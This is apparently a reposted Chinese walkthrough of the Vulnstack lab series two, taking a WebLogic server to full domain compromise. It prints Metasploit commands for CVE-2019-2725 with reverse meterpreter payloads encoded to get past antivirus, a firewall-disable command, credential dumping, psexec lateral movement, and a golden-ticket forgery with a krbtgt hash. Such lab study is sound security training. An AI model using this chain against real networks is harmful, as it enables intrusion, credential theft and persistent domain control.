ATTCK实战系列-Vulnstack靶场内网域渗透(二)

news2024/11/18 21:45:36

ATT&CK实战系列-Vulnstack靶场内网域渗透(二)

  • 前言
  • 一、环境搭建
    • 1.1 靶场下载地址
    • 1.2 环境配置
      • 1.2.1 DC域控服务器:
      • 1.2.2 WEB服务器:
      • 1.2.3 PC域内主机:
      • 1.2.4 攻击者kali:
    • 1.3 靶场拓扑图
  • 二、外网渗透
    • 2.1 信息收集
    • 2.2 Weblogic 10.3.6.0
      • 2.2.1 漏洞利用
      • 2.2.2 MSF派生会话给CS
  • 三、内网渗透
    • 3.1 本机信息收集
    • 3.2 域内信息收集
  • 四、内网渗透
    • 4.1 psexec 传递
    • 4.2 横向移动
    • 4.3 权限维持
    • 4.4 黄金票据

前言

本次靶场环境主要包括Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

1.Bypass UAC
2.Windows系统NTLM获取
3.Access Token利用(MSSQL利用)
4.WMI利用
5.网页代理,二层代理,特殊协议代理
6.域内信息收集
7.域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
8.域凭证收集
9.后门技术(黄金票据、白银票据、Sid History、MOF)

一、环境搭建

1.1 靶场下载地址

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
默认密码:1qaz@WSX

1.2 环境配置

下载好靶机打开vmx文件即可,将外网网段设置为192.168.111.0/24,其他设置都默认。

在这里插入图片描述

1.2.1 DC域控服务器:

• 内网IP:10.10.10.10
• 系统:Windows Server 2012(64位)
• 用户名:de1ay

1.2.2 WEB服务器:

注意:(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去)

•模拟外网IP:192.168.111.80
•内网IP:10.10.10.80
•系统:Windows Server 2008(64位)

启动后在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,使用管理员身份运行即可。

接下来的操作遇到这个界面就管理员身份运行它即可,管理员账号密码均为:Administrator/1qaz@WSX

在这里插入图片描述

在这里插入图片描述
然后点击计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动

在这里插入图片描述

1.2.3 PC域内主机:

•模拟外网IP:192.168.111.201
•内网IP:10.10.10.201
•系统:Windows 7(32位)

点击计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动

在这里插入图片描述

1.2.4 攻击者kali:

•模拟外网IP:192.168.111.128
•系统:linux

1.3 靶场拓扑图

在这里插入图片描述

二、外网渗透

2.1 信息收集

已知Web服务器的公网IP为192.168.111.80,所以,我们先对其Web服务器进行端口扫描:

nmap -T4 -sC -sV 192.168.111.80

在这里插入图片描述
端口扫描结果得知:

  • 445端口开放可能存在smb服务可能还会有ms17-010 端口溢出漏洞
  • 139端口开放就存在有samba服务可能会有远程命令执行漏洞
  • 1433端口开放就存在mssql服务有可能存在爆破 注入 sa弱口令
  • 3389远程桌面服务 7001端口 weblogic服务

我们先从7001端口上的Weblogic下手。

2.2 Weblogic 10.3.6.0

在这里插入图片描述
直接使用 WeblogicScan 扫描一下可能存在的漏洞,工具地址: https://github.com/rabbitmask/WeblogicScan

命令:python WeblogicScan.py -u 192.168.111.80 -p 7001

在这里插入图片描述

2.2.1 漏洞利用

存在的漏洞先试试CVE-2019-2725,我们在metasploit上找到了该漏洞的利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target Windows
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.111.80   #靶机ip
set lhost 192.168.111.128   #攻击者kali ip
setg EnableStageEncoding true   #编码绕过
setg StageEncoder x64/zutto_dekiru  # 进行编码
exploit

在这里插入图片描述
该模块所携带的payload是针对unix环境,所以设置为windows环境
在这里插入图片描述
执行后,成功返回meterpreter,并且为管理员权限。

这里我们做编码的目的是为了绕过360,也可以使用一些其它免杀的方式,这里使用的msf的自免杀,使用x64/zutto_dekiru编码绕过。

2.2.2 MSF派生会话给CS

为了方便后面的渗透,我这里也给Cobaltstrike派生了一个shell:

首先CS创建监听器
在这里插入图片描述

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.128   
set lport 9999
set session 3
exploit

在这里插入图片描述
CS成功上线!
在这里插入图片描述
在这里插入图片描述

三、内网渗透

3.1 本机信息收集

拿到了目标Web服务器的权限后,我们开始对目标主机及其所在的网络环境进行信息收集。
抓取明文密码 logonpasswords
在这里插入图片描述

shell systeminfo    // 查看操作系统信息

在这里插入图片描述

shell ipconfig /all       // 查询本机IP段,所在域等

在这里插入图片描述
whoami // 查看当前用户、权限
net user // 查看本地用户
net localgroup administrators // 查看本地管理员组(通常包含域用户)
在这里插入图片描述

综上可知目标Web服务器主机的操作系统为Windows Server 2008,具有两个网卡分别连通192.168.111.1/24和10.10.10.1/24两个网段。

3.2 域内信息收集

查询域内用户 net user /domain #该命令在本环境中需要在system权限下执行
直接在CS上提权

首先关闭防火墙 netsh advfirewall set allprofiles state off

在这里插入图片描述

net view /domain       //查看有几个域  

在这里插入图片描述

net view                          // 查看域内主机   

在这里插入图片描述

net config workstation     // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等

在这里插入图片描述

net group "domain computers" /domain      // 查看域内的机器

在这里插入图片描述

net user /domain                                        // 查看域用户
net group "domain controllers" /domain          // 查看域控制器组

在这里插入图片描述

net group "Enterprise Admins" /domain    // 查看域管理员组

在这里插入图片描述
从收集的信息可知,目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrator。

四、内网渗透

4.1 psexec 传递

psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。
获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口

命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 10.10.10.0/24 445 arp 200

在这里插入图片描述
可看到域控机器DC开放了445端口

4.2 横向移动

利用 psexec 横向移动至DC,使域控成功上线。
新建监听器
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
DC成功上线!

在这里插入图片描述

4.3 权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID

hashdump

在这里插入图片描述

logonpasswords

在这里插入图片描述
如上图所示,我们得到krbtgt用户的Hash为:82dfc71b72a11ef37d663047bc2088fb,
域sid为S-1-5-21-2756371121-2868759905-3853650604-1001

4.4 黄金票据

黄金票据是伪造票据授予票据(TGT),也被称为认证票据,TGT仅用于向域服务器上的密钥分配中心(KDC)证明用户已经被其他的域控制器认证

黄金票据的条件:

 1. 域名城 
 2. 域的sid值 
 3. 域的krbtgt账户htlm密码哈希 
 4. 伪造用户名

黄金票据可以在拥有普通域用户权限和krbtgt账户的hash的情况下用来获取域管理员权限,上面已经获取了域控的system权限了,还可以使用黄金票据做权限维持,当域控制器权限掉了之后,在通过域内其他任意机器伪造票据重新获取最高权限
在这里插入图片描述
将以上获取的信息填写到会话中

在这里插入图片描述
成功伪造

在这里插入图片描述
此时,攻击者就可以利用这台普通域用户的主机任意访问域控制器了,如下列出域控的C盘目录:

dir \\DC\c$

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2162166.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringCloud微服务实现服务熔断的实践指南

Spring Cloud是一套分布式系统的微服务框架,它提供了一系列的组件和工具,能够使我们更容易地构建和管理微服务架构。在实际开发中,由于各个服务之间的通信依赖,一旦某个服务出现故障或负载过高,可能会导致整个系统的性…

Growthly Quest 增长工具:助力 Web3 项目实现数据驱动的增长

作者:Stella L (stellafootprint.network) 在瞬息万变的 Web3 领域,众多项目在用户吸引、参与和留存方面遭遇重重难关。Footprint Analytics 推出 Growthly,作为应对这些挑战的全方位解决方案,其中创新性的 Quest(任务…

Maya学习笔记:物体的层级关系

文章目录 父子关系设置父子关系同时显示两个大纲视图 组 父子关系 设置父子关系 设置父子物体: 方法1 先选择子物体,按住shift再选中父物体,按P或者G键 方法2 在大纲视图中按住鼠标中间,拖动一个物体到另一个物体上 取消父子关…

HC32F460JETA使用串口DMA循环传输数据时遇到问题,只传输了一次就停止传输,如何解决??

🏆本文收录于《CSDN问答解惑-专业版》专栏,主要记录项目实战过程中的Bug之前因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由🚀;同时,欢迎大家关注&&收…

物联网实践教程:微信小程序结合OneNET平台MQTT实现STM32单片机远程智能控制 远程上报和接收数据——STM32代码实现篇

STM32代码实现 开启本章节需要完成下方的前置任务: 点击跳转: 物联网实践教程:微信小程序结合OneNET平台MQTT实现STM32单片机远程智能控制 远程上报和接收数据——汇总 目标 1.连接OneNET:STM32使用串口与ESP8266/01s连接发送…

基于Vue3组件封装的技巧分享

本文在Vue3的基础上针对一些常见UI组件库组件进行二次封装,旨在追求更好的个性化,更灵活的拓展,提供一些个人的思路见解,如有不妥之处,敬请指出。核心知识点$attrs,$slots 需求 需求背景 日常开发中,我们经…

PHP判断微信或QQ访问

PHP判断微信或QQ访问 若是微信或者QQ打开&#xff0c;提示图会覆盖网页&#xff0c;但网页功能仍在运行&#xff01; <meta name"viewport" content"initial-scale1, maximum-scale1, user-scalableno, widthdevice-width"><style> .top-gui…

leetcode第169题:多数元素

给定一个大小为 n 的数组 nums &#xff0c;返回其中的多数元素。多数元素是指在数组中出现次数 大于 ⌊ n/2 ⌋ 的元素。 你可以假设数组是非空的&#xff0c;并且给定的数组总是存在多数元素。 示例 1&#xff1a; 输入&#xff1a;nums [3,2,3] 输出&#xff1a;3 示例 …

OpenHarmony(鸿蒙南向)——平台驱动开发【ADC】

往期知识点记录&#xff1a; 鸿蒙&#xff08;HarmonyOS&#xff09;应用层开发&#xff08;北向&#xff09;知识点汇总 鸿蒙&#xff08;OpenHarmony&#xff09;南向开发保姆级知识点汇总~ 持续更新中…… 概述 功能简介 ADC&#xff08;Analog to Digital Converter&…

LOGO设计新革命:5款AI工具让你秒变设计大师(必藏)

大家好&#xff0c;我是Shelly&#xff0c;一个专注于输出AI工具和科技前沿内容的AI应用教练&#xff0c;体验过300款以上的AI应用工具。关注科技及大模型领域对社会的影响10年。关注我一起驾驭AI工具&#xff0c;拥抱AI时代的到来。 你是否曾因设计一个既独特又专业的LOGO而感…

JUC高并发编程2:Lock接口

1 synchronized 1.1 synchronized关键字回顾 synchronized 是 Java 中的一个关键字&#xff0c;用于实现线程间的同步。它提供了一种简单而有效的方式来控制对共享资源的访问&#xff0c;从而避免多个线程同时访问同一资源时可能出现的竞态条件&#xff08;race condition&am…

【Linux网络 —— 网络基础概念】

Linux网络 —— 网络基础概念 计算机网络背景网络发展 初始协议协议分层协议分层的好处 OSI七层模型TCP/IP五层(或四层)模型 再识协议为什么要有TCP/IP协议&#xff1f;什么是TCP/IP协议&#xff1f;TCP/IP协议与操作系统的关系所以究竟什么是协议&#xff1f; 网络传输基本流程…

【openwrt】 libubox组件——ustream

文章目录 ustream 核心数据结构struct ustreamstruct ustream_buf_liststruct ustream_bufstruct ustream_fd ustream 核心APIustream_fd_initustream_uloop_cbustream_fd_read_pendingustream_fill_read ustream_write_pendingustream_writeustream_fd_write ustream 应用示例…

Python画笔案例-059 绘制甩曲彩点动图

1、绘制甩曲彩点动图 通过 python 的turtle 库绘制 甩曲彩点动图,如下图: 2、实现代码 绘制甩曲彩点动图,以下为实现代码: """甩曲彩点动图.py """ import time import turtlecs = [red,orange,

CVPT: Cross-Attention help Visual Prompt Tuning adapt visual task

论文汇总 当前的问题 图1:在VTAB-1k基准测试上&#xff0c;使用预训练的ViT-B/16模型&#xff0c;VPT和我们的CVPT之间的性能和Flops比较。我们将提示的数量分别设置为1、10、20、50,100,150,200。 如图1所示&#xff0c;当给出大量提示时&#xff0c;VPT显示了性能的显著下降…

串口问题汇总:串口发送乱码,重定义使用printf ,输出顺序出错,缓存区思想,串口项目应用

1.c51使用串口出现顺序被覆盖的情况&#xff0c;也就是输出time 最后输出的却是te 这是因为你没有等待上一个数据发送就开始发送下一个数据就会导致数据篡位 2.c51想使用串口重定义使用printf 首先c51是自带stdio.h不需要像32那样点击 include lib选项&#xff0c;你直接改…

力扣958:判断二叉树是否为完全二叉树

给你一棵二叉树的根节点 root &#xff0c;请你判断这棵树是否是一棵 完全二叉树 。 在一棵 完全二叉树 中&#xff0c;除了最后一层外&#xff0c;所有层都被完全填满&#xff0c;并且最后一层中的所有节点都尽可能靠左。最后一层&#xff08;第 h 层&#xff09;中可以包含 …

体制内打工人收藏!5款AI写作工具,助你变成单位笔杆子~

对于初入体制内职场的新手或是日常任务繁重、难以抽身撰写文件的同事们&#xff0c;别再让加班的夜晚成为常态&#xff01;现在&#xff0c;就让我揭秘几个高效公文写作宝库&#xff0c;它们能助你迅速掌握公文写作的精髓&#xff0c;海量素材信手拈来&#xff0c;更有快速成文…

Elasticsearch、ik分词器、elasticsearch-head、Kibana的认识与安装

文章目录 elasticsearch安装elasticsearchIK中文分词器elasticsearch-headkibana elasticsearch Elasticsearch是一个基于Lucene的搜索服务器&#xff0c;也是属于NoSQL阵营的数据库。它提供了一个分布式多用户能力的全文搜索引擎&#xff0c;基于RESTful web接口提供给我们操…

2025年SEO策略:如何优化您的知识库?

如今很多人在遇到问题时都会求助于谷歌。谷歌已经成为提供解决方案不可或缺的工具。作为全球搜索引擎的巨头&#xff0c;拥有大量用户流量。这就是为什么确保您的产品和服务在谷歌搜索结果中排名靠前是至关重要的&#xff0c;如果您想获得更多的客户&#xff0c;SEO是一个非常关…